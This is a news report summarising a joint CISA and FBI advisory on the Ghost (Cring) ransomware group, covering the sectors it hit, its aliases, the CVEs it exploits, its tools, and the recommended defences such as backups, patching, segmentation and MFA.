The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued a joint advisory. Attackers using Ghost ransomware have breached organizations in over 70 countries. This includes critical infrastructure organizations.
Industries Impacted by the Ghost Ransomware Breach
Many industries have been affected by this Ghost ransomware attack. These include healthcare, government, education, technology, and manufacturing. Numerous small and medium-sized businesses were also targeted.
Ghost Ransomware Tactics and Techniques
The advisory states that Ghost ransomware actors started attacking in early 2021. They targeted organizations with outdated software and firmware. This indiscriminate targeting led to compromises across more than 70 countries. This even includes organizations in China.
The Ghost ransomware group frequently changes tactics. They rotate malware executables. They change encrypted file extensions. They alter ransom note content. They use multiple email addresses for ransom communications. This has made it difficult to track them.
Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Ransomware samples used include Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.
This financially motivated group uses publicly available code. They exploit vulnerabilities in servers. They target unpatched flaws in Fortinet (CVE-2018-13379), ColdFusion (CVE-2010-2861, CVE-2009-3960), and Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
Defending Against Ghost Ransomware Attacks
To protect against Ghost ransomware, CISA and FBI recommend these steps:
Regular Backups: Create regular and off-site backups. These should be protected from encryption.
Patching: Patch operating systems, software, and firmware immediately.
Focus on Flaws: Address security flaws targeted by Ghost ransomware (CVEs listed above).
Network Segmentation: Segment networks to limit the spread of infections.
MFA: Enforce phishing-resistant multi-factor authentication (MFA). This should be for all privileged accounts and email services.
Initial Access and Further Actions
Since early 2021, Ghost ransomware operators have used custom Mimikatz samples. They also used CobaltStrike beacons. They deployed ransomware payloads using Windows CertUtil. This bypassed security software.
The CVE-2018-13379 vulnerability was also exploited by state-sponsored groups. They scanned for vulnerable Fortinet SSL VPN appliances. This vulnerability was also used to breach US election support systems. Fortinet has warned customers to patch this multiple times.
The joint advisory includes indicators of compromise (IOCs), tactics, techniques, and procedures (TTPs). It also includes detection methods. These were identified in FBI investigations as recently as January 2025.
